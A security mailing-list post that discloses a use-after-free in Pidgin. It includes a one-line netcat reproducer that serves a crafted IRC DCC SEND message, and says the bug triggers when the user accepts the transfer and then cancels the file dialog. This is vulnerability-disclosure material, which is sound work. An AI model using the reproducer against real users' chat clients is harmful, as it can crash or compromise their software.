Pidgin uaf when cancelling file select dialog after accepting DCC SEND
Joseph Bisch
joseph.bisch at gmail.com
Wed Sep 20 22:05:31 EDT 2017
Hi,
Here is the reproducer:
echo $':c PRIVMSG a :\x01DCC SEND a a a a\x01\r\n' | nc -l -p 6667
Then you must accept the dcc send and cancel out of the file select
dialog. If you either click save on the file select dialog or you do
not accept the dcc send, then the uaf does not happen.
Joseph
-------------- next part --------------
A non-text attachment was scrubbed...
Name: pidgin2.asan
Type: application/octet-stream
Size: 10691 bytes
Desc: not available
URL: <https://pidgin.im/cgi-bin/mailman/private/security/attachments/20170920/fc79d679/attachment.obj>
More information about the security
mailing list